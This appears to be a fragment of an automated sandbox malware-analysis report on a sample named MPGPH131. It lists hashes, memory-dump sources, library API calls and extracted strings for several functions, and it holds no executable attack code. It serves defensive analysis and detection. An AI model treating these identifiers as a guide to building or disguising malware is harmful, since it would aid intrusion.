                                  • Instruction Fuzzy Hash: 9841F4B1910204ABC704DF68DC45BAAFBB9FF45320F14C21EF91C9B681E770AA40DBA1
                                  APIs
                                    • Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB
                                  • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0057644F
                                  • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0057646A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
                                  • String ID: exists
                                  • API String ID: 1297148070-2996790960
                                  • Opcode ID: c43037f33be3b9858c81d9d278a7d8af6f11dd7e7b8b24d4e45428df7deef711
                                  • Instruction ID: b4c556fd099329a27958afa6282edcfba7e9ccc4cf8f1af42ebec8bbe268ecf3
                                  • Opcode Fuzzy Hash: c43037f33be3b9858c81d9d278a7d8af6f11dd7e7b8b24d4e45428df7deef711
                                  • Instruction Fuzzy Hash: 5641F372900604ABCF10DF59DD85BAAFBB9FB44720F048269EC18A3781EB356D14DBE1
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E4E29
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E4E42
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E594D
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 005E5966
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: 7f0ec6ac63b1e714348d93ce5ea9fcbb2f263dd01ba6f74fa7aaaf9d2f4caf81
                                  • Instruction ID: 9c57c5b074271b6f6070b71f4fb255c1ef998c92ed2daac337d17cfb051f85f3
                                  • Opcode Fuzzy Hash: 7f0ec6ac63b1e714348d93ce5ea9fcbb2f263dd01ba6f74fa7aaaf9d2f4caf81
                                  • Instruction Fuzzy Hash: CE51A070C00298DBDB18DFA4CC99BDEBFB5BF15314F148259E445AB382D7746A88CB52
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 005E99F1
                                  Strings
                                  • type must be string, but is , xrefs: 005E9A58
                                  • type must be boolean, but is , xrefs: 005E9AE2
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: type must be boolean, but is $type must be string, but is
                                  • API String ID: 118556049-436076039
                                  • Opcode ID: a4e4e0ca4b003bf21016009504091f0b8d08f472adc34043ede6c8375d69f1f7
                                  • Instruction ID: ef2bd2446b03d87dde9322ec38de9630bd514c597b0317076d13db0be612664f
                                  • Opcode Fuzzy Hash: a4e4e0ca4b003bf21016009504091f0b8d08f472adc34043ede6c8375d69f1f7
                                  • Instruction Fuzzy Hash: 2F3160B19041489FC718EBA4D846BAE7BA9FF45300F10417AF419D77C2EB35AE04C792